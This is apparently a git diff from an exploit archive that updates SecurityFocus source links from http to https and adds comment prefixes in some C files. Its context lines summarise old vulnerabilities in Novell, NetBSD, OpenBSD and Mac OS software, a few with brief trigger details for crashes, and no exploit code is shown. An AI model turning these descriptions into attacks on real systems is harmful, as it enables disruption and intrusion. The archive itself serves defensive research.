b/exploits/multiple/webapps/38366.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58334/info +source: https://www.securityfocus.com/bid/58334/info Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities. diff --git a/exploits/multiple/webapps/38463.txt b/exploits/multiple/webapps/38463.txt index 28c9dc7ab..62c7520c6 100644 --- a/exploits/multiple/webapps/38463.txt +++ b/exploits/multiple/webapps/38463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59053/info +source: https://www.securityfocus.com/bid/59053/info Aibolit is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/webapps/39288.txt b/exploits/multiple/webapps/39288.txt index e8d498abb..8872708c8 100644 --- a/exploits/multiple/webapps/39288.txt +++ b/exploits/multiple/webapps/39288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69303/info +source: https://www.securityfocus.com/bid/69303/info ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/43438.txt b/exploits/multiple/webapps/43438.txt index 71ef30146..73b27aab0 100644 --- a/exploits/multiple/webapps/43438.txt +++ b/exploits/multiple/webapps/43438.txt @@ -17,8 +17,8 @@ Add Site Script Injection Vulnerability: phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added. Solution: -http://www.securityfocus.com/bid/6632/solution/ -http://www.securityfocus.com/bid/6633/solution/ +https://www.securityfocus.com/bid/6632/solution/ +https://www.securityfocus.com/bid/6633/solution/ Proof Of Conecpt Exploit: phpLinks Arbitrary Command Proof Of Concept diff --git a/exploits/netbsd_x86/dos/29204.pl b/exploits/netbsd_x86/dos/29204.pl index b79474edc..68d37b291 100755 --- a/exploits/netbsd_x86/dos/29204.pl +++ b/exploits/netbsd_x86/dos/29204.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21377/info +source: https://www.securityfocus.com/bid/21377/info NetBSD ftpd and tnftpd are prone to a remote buffer-overflow vulnerability. This issue is due to an off-by-one error; it allows attackers to corrupt memory. diff --git a/exploits/netbsd_x86/local/19261.txt b/exploits/netbsd_x86/local/19261.txt index 348f0eb15..eed993604 100644 --- a/exploits/netbsd_x86/local/19261.txt +++ b/exploits/netbsd_x86/local/19261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/331/info +source: https://www.securityfocus.com/bid/331/info A vulnerability exists in NetBSD version 1.3.2 and lower, and Silicon Graphics Inc's IRIX versions 6.2, 6.3, 6.4, 6.5 and 6.5.1. The at(1) program can be supplied with a -f flag, and an error is access validation can result in the mailing of portions of unreadable files to any user who can run at. diff --git a/exploits/netbsd_x86/remote/21364.txt b/exploits/netbsd_x86/remote/21364.txt index dcadd102a..50f702776 100644 --- a/exploits/netbsd_x86/remote/21364.txt +++ b/exploits/netbsd_x86/remote/21364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4419/info +source: https://www.securityfocus.com/bid/4419/info talkd is a client-server application shipped with many Unix and Linux variants that is used for communication between users locally or remotely. diff --git a/exploits/netware/dos/19854.sh b/exploits/netware/dos/19854.sh index 61d0476b9..a25fa8c63 100755 --- a/exploits/netware/dos/19854.sh +++ b/exploits/netware/dos/19854.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1118/info +source: https://www.securityfocus.com/bid/1118/info The Netware Remote Administration utility can be compromised to allow arbitrary code to be remotely run on the server. diff --git a/exploits/netware/dos/22949.txt b/exploits/netware/dos/22949.txt index d0cd874b8..9c2646346 100644 --- a/exploits/netware/dos/22949.txt +++ b/exploits/netware/dos/22949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8251/info +source: https://www.securityfocus.com/bid/8251/info Novell Netware Enterprise Web Server cgi2perl.nlm has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/netware/remote/19364.txt b/exploits/netware/remote/19364.txt index 8b761411f..2f537270e 100644 --- a/exploits/netware/remote/19364.txt +++ b/exploits/netware/remote/19364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/482/info +source: https://www.securityfocus.com/bid/482/info The encrypted passwords for Remote.NLM are remotely accessible to anyone with the ability to view SYS:System\LDRemote.NCF. The password encryption algorithm for Remote.NLM has been broken and can be decrypted with pencil and paper. diff --git a/exploits/netware/remote/19365.txt b/exploits/netware/remote/19365.txt index 54f13970c..5c92fd759 100644 --- a/exploits/netware/remote/19365.txt +++ b/exploits/netware/remote/19365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/484/info +source: https://www.securityfocus.com/bid/484/info Non-authenticated clients have access to CX.EXE and NLIST.EXE in the SYS:LOGIN directory of a Netware 4.x server. The default root access is set to Read. Therefore, by using various switch options in CX.EXE and NLIST.EXE, anyone connecting to the server can gain access to NDS tree information such as account names, group names and membership, tree layout etc. By attaching to different servers and switching contexts an intruder could gain an understanding of the NDS structure for the entire network. diff --git a/exploits/netware/remote/23586.txt b/exploits/netware/remote/23586.txt index 64716c643..e2f04758a 100644 --- a/exploits/netware/remote/23586.txt +++ b/exploits/netware/remote/23586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23587.txt b/exploits/netware/remote/23587.txt index c145beba8..af70fd025 100644 --- a/exploits/netware/remote/23587.txt +++ b/exploits/netware/remote/23587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23588.txt b/exploits/netware/remote/23588.txt index 5c63c5964..45b1e18da 100644 --- a/exploits/netware/remote/23588.txt +++ b/exploits/netware/remote/23588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23589.txt b/exploits/netware/remote/23589.txt index 2916bc3b9..f9e1b5f15 100644 --- a/exploits/netware/remote/23589.txt +++ b/exploits/netware/remote/23589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/novell/dos/19541.txt b/exploits/novell/dos/19541.txt index 7abc338c2..26dae73f8 100644 --- a/exploits/novell/dos/19541.txt +++ b/exploits/novell/dos/19541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/700/info +source: https://www.securityfocus.com/bid/700/info Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. diff --git a/exploits/novell/dos/19744.txt b/exploits/novell/dos/19744.txt index c9fdc7101..fccbf2f30 100644 --- a/exploits/novell/dos/19744.txt +++ b/exploits/novell/dos/19744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/972/info +source: https://www.securityfocus.com/bid/972/info By requesting a long URL from a Novell Groupwise 5.5 webserver with the Enhancement Pack installed, it is possible to cause the server to abend, the Java.nlm to take up all available CPU resource, or to stop the post office service. The server will need to be rebooted to restore normal operation. diff --git a/exploits/novell/dos/19746.txt b/exploits/novell/dos/19746.txt index 8ad94409d..72c2e463a 100644 --- a/exploits/novell/dos/19746.txt +++ b/exploits/novell/dos/19746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/976/info +source: https://www.securityfocus.com/bid/976/info A feature called the CS Audit Trail Proxy is installed by default with BorederManager 3.0 and 3.5 .This feature opens a listening port at port 2000, on both the internal and external interfaces. If a connection is made to this port and the 'enter' key hit a few times, the server will start experincing memory allocation problems. Eventually the server will have to be rebooted to restore normal functionality. diff --git a/exploits/novell/dos/20072.txt b/exploits/novell/dos/20072.txt index 248801321..76f17ba40 100644 --- a/exploits/novell/dos/20072.txt +++ b/exploits/novell/dos/20072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1467/info +source: https://www.securityfocus.com/bid/1467/info When Novell Netware is configured with IPX-Compatibility enabled, it is vulnerable to a denial of service attack by sending packets with random data to port 40193. Similar results are possible by sending fragmented packets. This has been observed on Novell Netware 5.0 service pack 5, other versions may be vulnerable. diff --git a/exploits/novell/dos/22749.txt b/exploits/novell/dos/22749.txt index 4e2deff9f..60184ad4f 100644 --- a/exploits/novell/dos/22749.txt +++ b/exploits/novell/dos/22749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7841/info +source: https://www.securityfocus.com/bid/7841/info It has been reported that the HTTP Stack distributed with Novell Netware and eDirectory does not properly handle some types of malformed packets. Because of this, an attacker may be able to cause a denial of service to legitimate users of the HTTP service. diff --git a/exploits/novell/dos/31710.txt b/exploits/novell/dos/31710.txt index d23d2e2df..66d7e29fa 100644 --- a/exploits/novell/dos/31710.txt +++ b/exploits/novell/dos/31710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28944/info +source: https://www.securityfocus.com/bid/28944/info Novell GroupWise is prone to an HTML-injection vulnerability and a denial-of-service vulnerability. diff --git a/exploits/novell/dos/31889.pl b/exploits/novell/dos/31889.pl index 71757dbe6..fb3390527 100755 --- a/exploits/novell/dos/31889.pl +++ b/exploits/novell/dos/31889.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29602/info +source: https://www.securityfocus.com/bid/29602/info Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/novell/dos/32951.py b/exploits/novell/dos/32951.py index 09a873baf..4c58383b5 100755 --- a/exploits/novell/dos/32951.py +++ b/exploits/novell/dos/32951.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34693/info +source: https://www.securityfocus.com/bid/34693/info Recover Data for Novell Netware is prone to a remote denial-of-service vulnerability. diff --git a/exploits/novell/dos/33183.html b/exploits/novell/dos/33183.html index 584263490..5365acddb 100644 --- a/exploits/novell/dos/33183.html +++ b/exploits/novell/dos/33183.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36139/info +source: https://www.securityfocus.com/bid/36139/info The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. diff --git a/exploits/novell/dos/33184.html b/exploits/novell/dos/33184.html index 551f8c74a..90148c1f9 100644 --- a/exploits/novell/dos/33184.html +++ b/exploits/novell/dos/33184.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36139/info +source: https://www.securityfocus.com/bid/36139/info The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. diff --git a/exploits/novell/dos/34980.py b/exploits/novell/dos/34980.py index 5a35a8830..247859b43 100755 --- a/exploits/novell/dos/34980.py +++ b/exploits/novell/dos/34980.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44732/info +source: https://www.securityfocus.com/bid/44732/info Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue. diff --git a/exploits/novell/local/28427.pl b/exploits/novell/local/28427.pl index 480853124..7b65bfa51 100755 --- a/exploits/novell/local/28427.pl +++ b/exploits/novell/local/28427.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19688/info +source: https://www.securityfocus.com/bid/19688/info Novell Identity Manager is prone to an arbitrary command-execution vulnerability. diff --git a/exploits/novell/remote/19682.txt b/exploits/novell/remote/19682.txt index 1a9a419d9..98c4ef545 100644 --- a/exploits/novell/remote/19682.txt +++ b/exploits/novell/remote/19682.txt @@ -1,6 +1,6 @@ Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities -source: http://www.securityfocus.com/bid/879/info +source: https://www.securityfocus.com/bid/879/info The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings. diff --git a/exploits/novell/remote/20482.txt b/exploits/novell/remote/20482.txt index 9c58221a9..1a100cb58 100644 --- a/exploits/novell/remote/20482.txt +++ b/exploits/novell/remote/20482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2076/info +source: https://www.securityfocus.com/bid/2076/info Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scripts and HTML files to help administrators design web sites. It is not a support Novell product and is provided solely as a convenience to the user. The toolkit contained a script called "FILES.PL" that could be used to view the contents of files or directories on the server by a remote attacker. This is done by passing the parameter "file=" to the script. An attacker could gain information useful in conducting subsequent attacks, or retrieve personal or proprietary information. diff --git a/exploits/novell/remote/21182.txt b/exploits/novell/remote/21182.txt index 1cd3f1a85..fbd56b214 100644 --- a/exploits/novell/remote/21182.txt +++ b/exploits/novell/remote/21182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3697/info +source: https://www.securityfocus.com/bid/3697/info Novell Groupwise Servlet Gateway is a product that allows Java servlets to be run with NetWare, using Novell JVM for NetWare v1.1.7b and NetWare Enterprise Web Server. diff --git a/exploits/novell/remote/21488.txt b/exploits/novell/remote/21488.txt index a3d5fb234..d9cd2eab7 100644 --- a/exploits/novell/remote/21488.txt +++ b/exploits/novell/remote/21488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4874/info +source: https://www.securityfocus.com/bid/4874/info It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user. diff --git a/exploits/novell/remote/21731.pl b/exploits/novell/remote/21731.pl index ef37e7ef3..9c708e385 100755 --- a/exploits/novell/remote/21731.pl +++ b/exploits/novell/remote/21731.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5520/info +source: https://www.securityfocus.com/bid/5520/info A vulnerability has been reported in some versions of Novell NetWare. This issue lies in the handling of some HTTP requests when Perl is used as a handler by a web server. diff --git a/exploits/novell/remote/28835.pl b/exploits/novell/remote/28835.pl index a10b872e1..9b43b3bc2 100755 --- a/exploits/novell/remote/28835.pl +++ b/exploits/novell/remote/28835.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/28836.c b/exploits/novell/remote/28836.c index 664c84078..ffffcd674 100644 --- a/exploits/novell/remote/28836.c +++ b/exploits/novell/remote/28836.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +// source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/28837.rb b/exploits/novell/remote/28837.rb index e7dff3894..f65fe8bfd 100755 --- a/exploits/novell/remote/28837.rb +++ b/exploits/novell/remote/28837.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/29400.txt b/exploits/novell/remote/29400.txt index 9f408cda2..a0869ebb3 100644 --- a/exploits/novell/remote/29400.txt +++ b/exploits/novell/remote/29400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21921/info +source: https://www.securityfocus.com/bid/21921/info Access Manager Identity Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/29699.txt b/exploits/novell/remote/29699.txt index 92549ec4c..253dd48aa 100644 --- a/exploits/novell/remote/29699.txt +++ b/exploits/novell/remote/29699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22787/info +source: https://www.securityfocus.com/bid/22787/info Novell Access Management SSLVPN Server is prone to a security-bypass vulnerability. diff --git a/exploits/novell/remote/30432.txt b/exploits/novell/remote/30432.txt index 46516d0ed..786286fe8 100644 --- a/exploits/novell/remote/30432.txt +++ b/exploits/novell/remote/30432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25126/info +source: https://www.securityfocus.com/bid/25126/info Novell GroupWise WebAccess is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/31095.txt b/exploits/novell/remote/31095.txt index c8b8a16b6..49e846842 100644 --- a/exploits/novell/remote/31095.txt +++ b/exploits/novell/remote/31095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27582/info +source: https://www.securityfocus.com/bid/27582/info Novell GroupWise WebAccess is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/31533.txt b/exploits/novell/remote/31533.txt index 137fb7b78..e46b94351 100644 --- a/exploits/novell/remote/31533.txt +++ b/exploits/novell/remote/31533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28441/info +source: https://www.securityfocus.com/bid/28441/info Novell eDirectory is prone to an unspecified vulnerability that can result in unauthorized file access or a denial of service. diff --git a/exploits/novell/remote/32795.txt b/exploits/novell/remote/32795.txt index 9f8305b02..17cfdeca5 100644 --- a/exploits/novell/remote/32795.txt +++ b/exploits/novell/remote/32795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33708/info +source: https://www.securityfocus.com/bid/33708/info Novell QuickFinder Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/novell/remote/32876.txt b/exploits/novell/remote/32876.txt index 3e58add15..cbfe7498b 100644 --- a/exploits/novell/remote/32876.txt +++ b/exploits/novell/remote/32876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34267/info +source: https://www.securityfocus.com/bid/34267/info Novell NetStorage is prone to the following remote vulnerabilities: diff --git a/exploits/novell/remote/33351.pl b/exploits/novell/remote/33351.pl index 1db6b26b1..0a5a72951 100755 --- a/exploits/novell/remote/33351.pl +++ b/exploits/novell/remote/33351.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37009/info +source: https://www.securityfocus.com/bid/37009/info Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/novell/remote/33767.rb b/exploits/novell/remote/33767.rb index 81d20c855..8a3ba5111 100755 --- a/exploits/novell/remote/33767.rb +++ b/exploits/novell/remote/33767.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38782/info +source: https://www.securityfocus.com/bid/38782/info Novell eDirectory is prone to a session-hijacking vulnerability. diff --git a/exploits/openbsd/dos/20271.c b/exploits/openbsd/dos/20271.c index 06e610cf7..f7e56f582 100644 --- a/exploits/openbsd/dos/20271.c +++ b/exploits/openbsd/dos/20271.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1759/info +// source: https://www.securityfocus.com/bid/1759/info OpenBSD is vulnerable to a remotely exploitable denial of service condition. The problem seems to be a lack of limits on the storage of pending arp requests, and a failure to handle the condition of too many. If an attacker somehow causes a victim machine to send out too many arp requests, it can cause a kernel panic and the target system to halt. diff --git a/exploits/openbsd/dos/21167.c b/exploits/openbsd/dos/21167.c index 1daf8b650..ed7a6eced 100644 --- a/exploits/openbsd/dos/21167.c +++ b/exploits/openbsd/dos/21167.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3612/info +// source: https://www.securityfocus.com/bid/3612/info OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation. diff --git a/exploits/openbsd/dos/23339.c b/exploits/openbsd/dos/23339.c index e07803ca9..a560a4960 100644 --- a/exploits/openbsd/dos/23339.c +++ b/exploits/openbsd/dos/23339.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8978/info +// source: https://www.securityfocus.com/bid/8978/info The OpenBSD team has fixed a vulnerability in the OpenBSD kernel when handling certain executables. It appears that the problem lies in the lack of specific sanity checks on binary header values. As a result, a user who constructs a malformed binary and subsequently executes it may trigger a kernel panic. diff --git a/exploits/openbsd/dos/23389.c b/exploits/openbsd/dos/23389.c index eaa8e2632..c5c3269c9 100644 --- a/exploits/openbsd/dos/23389.c +++ b/exploits/openbsd/dos/23389.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9073/info +// source: https://www.securityfocus.com/bid/9073/info A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This could be exploited by a malicious unprivileged local user to crash a target system. diff --git a/exploits/openbsd/dos/23392.c b/exploits/openbsd/dos/23392.c index be7b17929..b00d6713f 100644 --- a/exploits/openbsd/dos/23392.c +++ b/exploits/openbsd/dos/23392.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9086/info +// source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before handling a user-supplied semaphore set. It is said that this could lead to the corruption of kernel-based memory and may result in a kernel panic. diff --git a/exploits/openbsd/dos/24181.sh b/exploits/openbsd/dos/24181.sh index d7f0e018d..d8a657d0a 100755 --- a/exploits/openbsd/dos/24181.sh +++ b/exploits/openbsd/dos/24181.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10496/info +source: https://www.securityfocus.com/bid/10496/info It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability. diff --git a/exploits/openbsd/local/20256.c b/exploits/openbsd/local/20256.c index 2af393785..75963cc7b 100644 --- a/exploits/openbsd/local/20256.c +++ b/exploits/openbsd/local/20256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1746/info +// source: https://www.securityfocus.com/bid/1746/info fstat is a program shipped with BSD unix variants that is used to list the open files on a system. It is installed sgid kmem so it can access information about open files from the kernel memory structures. diff --git a/exploits/openbsd/local/21373.c b/exploits/openbsd/local/21373.c index 11d196dc4..75b71cd45 100644 --- a/exploits/openbsd/local/21373.c +++ b/exploits/openbsd/local/21373.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4495/info +source: https://www.securityfocus.com/bid/4495/info OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information. diff --git a/exploits/openbsd/local/22210.txt b/exploits/openbsd/local/22210.txt index f63ca4b71..72f50311c 100644 --- a/exploits/openbsd/local/22210.txt +++ b/exploits/openbsd/local/22210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6748/info +source: https://www.securityfocus.com/bid/6748/info It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary. diff --git a/exploits/openbsd/local/23046.c b/exploits/openbsd/local/23046.c index 705c71b2c..b68e67ee4 100644 --- a/exploits/openbsd/local/23046.c +++ b/exploits/openbsd/local/23046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8464/info +// source: https://www.securityfocus.com/bid/8464/info A vulnerability has been discovered in the OpenBSD semget() system call. The problem occurs due to insufficient sanity checks before allocating memory using the user-supplied nsems value as an argument. As a result, an attacker may be capable of modifying the running kernel. diff --git a/exploits/openbsd/local/23047.c b/exploits/openbsd/local/23047.c index dbe4a1d1c..14af505bc 100644 --- a/exploits/openbsd/local/23047.c +++ b/exploits/openbsd/local/23047.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8464/info +// source: https://www.securityfocus.com/bid/8464/info A vulnerability has been discovered in the OpenBSD semget() system call. The problem occurs due to insufficient sanity checks before allocating memory using the user-supplied nsems value as an argument. As a result, an attacker may be capable of modifying the running kernel. diff --git a/exploits/openbsd/local/29102.c b/exploits/openbsd/local/29102.c index e3fe5f7b3..2f7a39dd7 100644 --- a/exploits/openbsd/local/29102.c +++ b/exploits/openbsd/local/29102.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21188/info +source: https://www.securityfocus.com/bid/21188/info OpenBSD is prone to a local vulnerability that may allow attackers to pass malicious environment variables to applications, bypassing expected security restrictions. diff --git a/exploits/openbsd/remote/20733.c b/exploits/openbsd/remote/20733.c index 0b524882d..153683e6d 100644 --- a/exploits/openbsd/remote/20733.c +++ b/exploits/openbsd/remote/20733.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +// source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/openbsd/remote/22858.txt b/exploits/openbsd/remote/22858.txt index e21ad4335..bd64972b7 100644 --- a/exploits/openbsd/remote/22858.txt +++ b/exploits/openbsd/remote/22858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8082/info +source: https://www.securityfocus.com/bid/8082/info OpenBSD PF is prone to an information leakage vulnerability when configured to redirect incoming traffic from standard ports to high ports. This occurs because PF responds different to packets destined for active private addresses than to those destined for inactive ones. This could be exploited to enumerate network resources for other network segments in preparation for further attacks. diff --git a/exploits/openbsd/remote/29725.py b/exploits/openbsd/remote/29725.py index 85b8a95cb..b90af8f78 100755 --- a/exploits/openbsd/remote/29725.py +++ b/exploits/openbsd/remote/29725.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22901/info +source: https://www.securityfocus.com/bid/22901/info OpenBSD is prone to a remote buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/osx/dos/20844.txt b/exploits/osx/dos/20844.txt index 0c70aa9dd..0758b47cb 100644 --- a/exploits/osx/dos/20844.txt +++ b/exploits/osx/dos/20844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2715/info +source: https://www.securityfocus.com/bid/2715/info Apple Personal Web Sharing is a utility that allows users to extend file-sharing abilities across a small intranet. It is shipped with MacOS 9. diff --git a/exploits/osx/dos/20845.txt b/exploits/osx/dos/20845.txt index b238cf464..206d479af 100644 --- a/exploits/osx/dos/20845.txt +++ b/exploits/osx/dos/20845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2716/info +source: https://www.securityfocus.com/bid/2716/info Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. diff --git a/exploits/osx/dos/20922.txt b/exploits/osx/dos/20922.txt index cd2e46790..3b90f7116 100644 --- a/exploits/osx/dos/20922.txt +++ b/exploits/osx/dos/20922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2864/info +source: https://www.securityfocus.com/bid/2864/info Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. diff --git a/exploits/osx/dos/21234.sh b/exploits/osx/dos/21234.sh index f4eec0abc..492db8643 100755 --- a/exploits/osx/dos/21234.sh +++ b/exploits/osx/dos/21234.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3918/info +source: https://www.securityfocus.com/bid/3918/info Timbuktu is a remote administration tool. It is available for the Microsoft Window's family of operating systems and Power PC based Macintosh computers. It supports a variety of administrative tasks, including full remote access to the user's desktop. diff --git a/exploits/osx/dos/21275.c b/exploits/osx/dos/21275.c index fd01690ee..1cb1f46c1 100644 --- a/exploits/osx/dos/21275.c +++ b/exploits/osx/dos/21275.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4031/info +// source: https://www.securityfocus.com/bid/4031/info ICQ For MacOS X is a port of the popular Mirabilis ICQ client to the Apple MacOS X platform. It is freely available. diff --git a/exploits/osx/dos/22074.txt b/exploits/osx/dos/22074.txt index 7eee90814..f9a06797a 100644 --- a/exploits/osx/dos/22074.txt +++ b/exploits/osx/dos/22074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6331/info +source: https://www.securityfocus.com/bid/6331/info Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware. diff --git a/exploits/osx/dos/22483.c b/exploits/osx/dos/22483.c index 2f8d9b24a..3d8594b9f 100644 --- a/exploits/osx/dos/22483.c +++ b/exploits/osx/dos/22483.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7323/info +// source: https://www.securityfocus.com/bid/7323/info MacOSX DirectoryService has been reported prone to a denial of service vulnerability. diff --git a/exploits/osx/dos/22629.txt b/exploits/osx/dos/22629.txt index e1309ca1f..3509107f4 100644 --- a/exploits/osx/dos/22629.txt +++ b/exploits/osx/dos/22629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7659/info +source: https://www.securityfocus.com/bid/7659/info A 